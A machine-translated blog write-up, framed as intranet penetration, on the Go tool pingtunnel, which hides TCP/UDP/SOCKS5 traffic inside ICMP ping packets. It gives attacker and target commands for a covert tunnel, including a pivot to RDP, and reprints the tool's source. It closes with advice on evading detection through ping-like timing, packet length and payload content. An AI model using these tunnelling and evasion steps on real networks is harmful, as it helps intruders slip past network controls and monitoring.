Preface

This paper studies ICMP A tool for tunnels ,pingtunnel

github：https://github.com/esrrhs/pingtunnel

One 、 summary

1、 brief introduction

Continuous updating , From Tencent boss , use Go To write , hold tcp/udp/sock5 Traffic disguised as icmp A tool for forwarding traffic , Cross platform

Conditions ：

• Target machine （ client ） Sure ping get out
• The target machine may need administrator privileges
• windows To be equipped with wincap

2、 principle

ICMP For the principle of tunnel, see ： Intranet penetration series ： Of Intranet tunnels ICMP Tunnel

3、 Use

（1） Direct connection out of the network

attack （ Server side ） Start the tunnel and close the system default ping

sudo ./pingtunnel -type server
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all

Target machine （ client ）

#  forward  sock5
./pingtunnel -type client -l :4455 -s www.yourserver.com -sock5 1
#  forward  tcp
./pingtunnel -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455 -tcp 1
#  forward  udp
./pingtunnel -type client -l :4455 -s www.yourserver.com -t www.yourserver.com:4455

（2） Springboard out of the net

Springboard machine

./pingtunnel -x 123456 # Set the password 

attack

./pingtunnel -p < Springboard machine ip> -lp 1080 -da < Target machine ip> -dp 3389 -x 123456
    -p  Appoint ICMP At the other end of the tunnel IP
    -lp： Specify the port for local listening 
    -da： Specifies the name of the target machine to forward IP
    -dp： Specify the port of the target machine to forward 
    -x： Specify the connection password 

Two 、 practice

1、 scene

attack （ Server side ）：kali 192.168.10.128
Target machine （ client ）：ubuntu 192.168.10.129

The target can ping Communication attack machine

2、 Build a tunnel

（1） attack

echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all  # Turn off the system default  ping（ Optional ）
[sudo] ./pingtunnel -type server -key 123456 # Set the password 

（2） Target machine

./pingtunnel -type client -l :8888 -s 192.168.10.128 -t 192.168.10.128:7777 -tcp 1 -key 123456

（3）nc

At this time, the tunnel is established successfully

Then you can go to the next step , such as nc

Target machine

The attacker received a message

3、 Grab the bag and have a look

Heartbeat packets and... When establishing a connection ARP Addressing

nc Command time package

3、 ... and 、 Explore

1、 Source code and Analysis

（1）main.go

It's mainly about how to use it , call server and client, Then there's a filter country filter Can be ignored （ The library to be called is a little large ）

package main

import (
	"flag"
	"fmt"
	"github.com/esrrhs/go-engine/src/common" 
	"github.com/esrrhs/go-engine/src/geoip"
	"github.com/esrrhs/go-engine/src/loggo"
	"github.com/esrrhs/go-engine/src/pingtunnel"
	"net"
	"net/http"
	_ "net/http/pprof"
	"strconv"
	"time"
)

var usage = `  By forging ping, hold tcp/udp/sock5 The traffic is forwarded to the destination server through the remote server . Used to break through the blockade of some operators TCP/UDP Traffic . By forging ping, the tcp/udp/sock5 traffic is forwarded to the destination server through the remote server. Used to break certain operators to block TCP/UDP traffic. Usage: // server pingtunnel -type server // client, Forward udp pingtunnel -type client -l LOCAL_IP:4455 -s SERVER_IP -t SERVER_IP:4455 // client, Forward tcp pingtunnel -type client -l LOCAL_IP:4455 -s SERVER_IP -t SERVER_IP:4455 -tcp 1 // client, Forward sock5, implicitly open tcp, so no target server is needed pingtunnel -type client -l LOCAL_IP:4455 -s SERVER_IP -sock5 1 -type  Server or client  client or server  Server parameters server param: -key  Set password for , Default 0 Set password, default 0 -nolog  Don't write log files , Print only standard output , Default 0 Do not write log files, only print standard output, default 0 is off -noprint  Do not print screen output , Default 0 Do not print standard output, default 0 is off -loglevel  Log file level , Default info log level, default is info -maxconn  maximum connection , Default 0, There is no limit on the  the max num of connections, default 0 is no limit -maxprt server Maximum number of processing threads , Default 100 max process thread in server, default 100 -maxprb server Maximum processing thread buffer Count , Default 1000 max process thread's buffer in server, default 1000 -conntt server Timeout for initiating a connection to the destination address , Default 1000ms The timeout period for the server to initiate a connection to the destination address. The default is 1000ms.  Client parameters client param: -l  Local address , The traffic sent to this port will be forwarded to the server  Local address, traffic sent to this port will be forwarded to the server -s  The address of the server , Traffic will be forwarded to this server through the tunnel  The address of the server, the traffic will be forwarded to this server through the tunnel -t  The destination address forwarded by the remote server , Traffic will be forwarded to this address  Destination address forwarded by the remote server, traffic will be forwarded to this address -timeout  Local record connection timeout time , The unit is seconds , Default 60s The time when the local record connection timed out, in seconds, 60 seconds by default -key  Set password for , Default 0 Set password, default 0 -tcp  Set whether to forward tcp, Default 0 Set the switch to forward tcp, the default is 0 -tcp_bs tcp The size of the send receive buffer , Default 1MB Tcp send and receive buffer size, default 1MB -tcp_mw tcp The largest window of , Default 20000 The maximum window of tcp, the default is 20000 -tcp_rst tcp Timeout sending time , Default 400ms Tcp timeout resend time, default 400ms -tcp_gz  When the packet exceeds this size ,tcp Compress data ,0 Means no compression , Default 0 Tcp will compress data when the packet exceeds this size, 0 means no compression, default 0 -tcp_stat  Print tcp Monitoring of , Default 0 Print tcp connection statistic, default 0 is off -nolog  Don't write log files , Print only standard output , Default 0 Do not write log files, only print standard output, default 0 is off -noprint  Do not print screen output , Default 0 Do not print standard output, default 0 is off -loglevel  Log file level , Default info log level, default is info -sock5  Turn on sock5 forward , Default 0 Turn on sock5 forwarding, default 0 is off -profile  Turn on performance detection at the specified port , Default 0 Don't open  Enable performance detection on the specified port. The default 0 is not enabled. -s5filter sock5 Set forwarding filtering mode , Default full forwarding , Set up CN representative CN Direct connections in the region are not forwarded  Set the forwarding filter in the sock5 mode. The default is full forwarding. For example, setting the CN indicates that the Chinese address is not forwarded. -s5ftfile sock5 Mode forward filtered data files , By default, the current directory is read GeoLite2-Country.mmdb The data file in sock5 filter mode, the default reading of the current directory GeoLite2-Country.mmdb `

func main() {
    

	defer common.CrashLog()

	t := flag.String("type", "", "client or server")
	listen := flag.String("l", "", "listen addr")
	target := flag.String("t", "", "target addr")
	server := flag.String("s", "", "server addr")
	timeout := flag.Int("timeout", 60, "conn timeout")
	key := flag.Int("key", 0, "key")
	tcpmode := flag.Int("tcp", 0, "tcp mode")
	tcpmode_buffersize := flag.Int("tcp_bs", 1*1024*1024, "tcp mode buffer size")
	tcpmode_maxwin := flag.Int("tcp_mw", 20000, "tcp mode max win")
	tcpmode_resend_timems := flag.Int("tcp_rst", 400, "tcp mode resend time ms")
	tcpmode_compress := flag.Int("tcp_gz", 0, "tcp data compress")
	nolog := flag.Int("nolog", 0, "write log file")
	noprint := flag.Int("noprint", 0, "print stdout")
	tcpmode_stat := flag.Int("tcp_stat", 0, "print tcp stat")
	loglevel := flag.String("loglevel", "info", "log level")
	open_sock5 := flag.Int("sock5", 0, "sock5 mode")
	maxconn := flag.Int("maxconn", 0, "max num of connections")
	max_process_thread := flag.Int("maxprt", 100, "max process thread in server")
	max_process_buffer := flag.Int("maxprb", 1000, "max process thread's buffer in server")
	profile := flag.Int("profile", 0, "open profile")
	conntt := flag.Int("conntt", 1000, "the connect call's timeout")
	s5filter := flag.String("s5filter", "", "sock5 filter")
	s5ftfile := flag.String("s5ftfile", "GeoLite2-Country.mmdb", "sock5 filter file")
	flag.Usage = func() {
    
		fmt.Printf(usage)
	}

	flag.Parse()

	if *t != "client" && *t != "server" {
    
		flag.Usage()
		return
	}
	if *t == "client" {
    
		if len(*listen) == 0 || len(*server) == 0 {
    
			flag.Usage()
			return
		}
		if *open_sock5 == 0 && len(*target) == 0 {
    
			flag.Usage()
			return
		}
		if *open_sock5 != 0 {
    
			*tcpmode = 1
		}
	}
	if *tcpmode_maxwin*10 > pingtunnel.FRAME_MAX_ID {
    
		fmt.Println("set tcp win too big, max = " + strconv.Itoa(pingtunnel.FRAME_MAX_ID/10))
		return
	}
	//  Log 
	level := loggo.LEVEL_INFO
	if loggo.NameToLevel(*loglevel) >= 0 {
    
		level = loggo.NameToLevel(*loglevel)
	}
	loggo.Ini(loggo.Config{
    
		Level:     level,
		Prefix:    "pingtunnel",
		MaxDay:    3,
		NoLogFile: *nolog > 0,
		NoPrint:   *noprint > 0,
	})
	loggo.Info("start...")
	loggo.Info("key %d", *key)

	if *t == "server" {
    
		s, err := pingtunnel.NewServer(*key, *maxconn, *max_process_thread, *max_process_buffer, *conntt)
		if err != nil {
    
			loggo.Error("ERROR: %s", err.Error())
			return
		}
		loggo.Info("Server start")
		err = s.Run()
		if err != nil {
    
			loggo.Error("Run ERROR: %s", err.Error())
			return
		}
	} else if *t == "client" {
    

		loggo.Info("type %s", *t)
		loggo.Info("listen %s", *listen)
		loggo.Info("server %s", *server)
		loggo.Info("target %s", *target)

		if *tcpmode == 0 {
    
			*tcpmode_buffersize = 0
			*tcpmode_maxwin = 0
			*tcpmode_resend_timems = 0
			*tcpmode_compress = 0
			*tcpmode_stat = 0
		}
		
		//  Filter countries , If it's not over the wall, you can ignore 
		if len(*s5filter) > 0 {
    
			err := geoip.Load(*s5ftfile)
			if err != nil {
    
				loggo.Error("Load Sock5 ip file ERROR: %s", err.Error())
				return
			}
		}
		filter := func(addr string) bool {
    
			if len(*s5filter) <= 0 {
    
				return true
			}

			taddr, err := net.ResolveTCPAddr("tcp", addr)
			if err != nil {
    
				return false
			}

			ret, err := geoip.GetCountryIsoCode(taddr.IP.String())
			if err != nil {
    
				return false
			}
			if len(ret) <= 0 {
    
				return false
			}
			return ret != *s5filter
		}

		c, err := pingtunnel.NewClient(*listen, *server, *target, *timeout, *key,
			*tcpmode, *tcpmode_buffersize, *tcpmode_maxwin, *tcpmode_resend_timems, *tcpmode_compress,
			*tcpmode_stat, *open_sock5, *maxconn, &filter)
		if err != nil {
    
			loggo.Error("ERROR: %s", err.Error())
			return
		}
		loggo.Info("Client Listen %s (%s) Server %s (%s) TargetPort %s:", c.Addr(), c.IPAddr(),
			c.ServerAddr(), c.ServerIPAddr(), c.TargetAddr())
		err = c.Run()
		if err != nil {
    
			loggo.Error("Run ERROR: %s", err.Error())
			return
		}
	} else {
    
		return
	}

	if *profile > 0 {
    
		go http.ListenAndServe("0.0.0.0:"+strconv.Itoa(*profile), nil)
	}

	for {
    
		time.Sleep(time.Hour)
	}
}

（2）pingtunnel.go

ICMP Packet construction and sending and receiving , among ICMP Bao He IP The package is constructed directly from net Library import , Sending and receiving are mainly content filling and some error Attention

package pingtunnel

import (
	"encoding/binary"
	"github.com/esrrhs/go-engine/src/common"
	"github.com/esrrhs/go-engine/src/loggo"
	"github.com/golang/protobuf/proto"
	"golang.org/x/net/icmp"
	"golang.org/x/net/ipv4"
	"net"
	"sync"
	"time"
)

func sendICMP(id int, sequence int, conn icmp.PacketConn, server *net.IPAddr, target string,
	connId string, msgType uint32, data []byte, sproto int, rproto int, key int,
	tcpmode int, tcpmode_buffer_size int, tcpmode_maxwin int, tcpmode_resend_time int, tcpmode_compress int, tcpmode_stat int,
	timeout int) {
    

	m := &MyMsg{
    
		Id:                  connId,
		Type:                (int32)(msgType),
		Target:              target,
		Data:                data,
		Rproto:              (int32)(rproto),
		Key:                 (int32)(key),
		Tcpmode:             (int32)(tcpmode),
		TcpmodeBuffersize:   (int32)(tcpmode_buffer_size),
		TcpmodeMaxwin:       (int32)(tcpmode_maxwin),
		TcpmodeResendTimems: (int32)(tcpmode_resend_time),
		TcpmodeCompress:     (int32)(tcpmode_compress),
		TcpmodeStat:         (int32)(tcpmode_stat),
		Timeout:             (int32)(timeout),
		Magic:               (int32)(MyMsg_MAGIC),
	}

	mb, err := proto.Marshal(m)
	if err != nil {
    
		loggo.Error("sendICMP Marshal MyMsg error %s %s", server.String(), err)
		return
	}

	body := &icmp.Echo{
    
		ID:   id,
		Seq:  sequence,
		Data: mb,
	}

	msg := &icmp.Message{
    
		Type: (ipv4.ICMPType)(sproto),
		Code: 0,
		Body: body,
	}

	bytes, err := msg.Marshal(nil)
	if err != nil {
    
		loggo.Error("sendICMP Marshal error %s %s", server.String(), err)
		return
	}

	conn.WriteTo(bytes, server)
}

func recvICMP(workResultLock *sync.WaitGroup, exit *bool, conn icmp.PacketConn, recv chan<- *Packet) {
    

	defer common.CrashLog()

	(*workResultLock).Add(1)
	defer (*workResultLock).Done()

	bytes := make([]byte, 10240)
	for !*exit {
    
		conn.SetReadDeadline(time.Now().Add(time.Millisecond * 100))
		n, srcaddr, err := conn.ReadFrom(bytes)

		if err != nil {
    
			nerr, ok := err.(net.Error)
			if !ok || !nerr.Timeout() {
    
				loggo.Info("Error read icmp message %s", err)
				continue
			}
		}

		if n <= 0 {
    
			continue
		}

		echoId := int(binary.BigEndian.Uint16(bytes[4:6]))
		echoSeq := int(binary.BigEndian.Uint16(bytes[6:8]))

		my := &MyMsg{
    }
		err = proto.Unmarshal(bytes[8:n], my)
		if err != nil {
    
			loggo.Debug("Unmarshal MyMsg error: %s", err)
			continue
		}

		if my.Magic != (int32)(MyMsg_MAGIC) {
    
			loggo.Debug("processPacket data invalid %s", my.Id)
			continue
		}

		recv <- &Packet{
    my: my,
			src:    srcaddr.(*net.IPAddr),
			echoId: echoId, echoSeq: echoSeq}
	}
}

type Packet struct {
    
	my      *MyMsg
	src     *net.IPAddr
	echoId  int
	echoSeq int
}

const (
	FRAME_MAX_SIZE int = 888
	FRAME_MAX_ID   int = 1000000
)

（3）client.go

800 Multiple lines ... Mainly due to the need to support TCP、UDP、SOCKS5

（4）server.go

The same is 800 Multiple lines ..

2、 Detection and bypass

（1） abnormal ICMP Number of packets

As shown in the figure nc period ,1s There are 10 A package

Consider setting the interval between packets to ping The interval of
Or cover with a fishy eye

（2） abnormal ICMP Bag length

As shown in the figure nc Packet when transmitting information , Abnormal length

Consider splitting the content , Limit length , Assemble after receiving

（3）payload Content

You can't hide payload Content detection

normal ping command ：

windows Under the system ping The default transmission is ：abcdefghijklmnopqrstuvwabcdefghi, common 32bytes
linux Under the system ,ping The default transmission is 48bytes, front 8bytes Over time , The back is fixed , The content is !”#$%&’()+,-./01234567

Encryption confusion, I don't know the effect , Depending on the rules ？

Conclusion

use go Written icmp Tunnel , More than any other icmp The tunnel needs a little cattle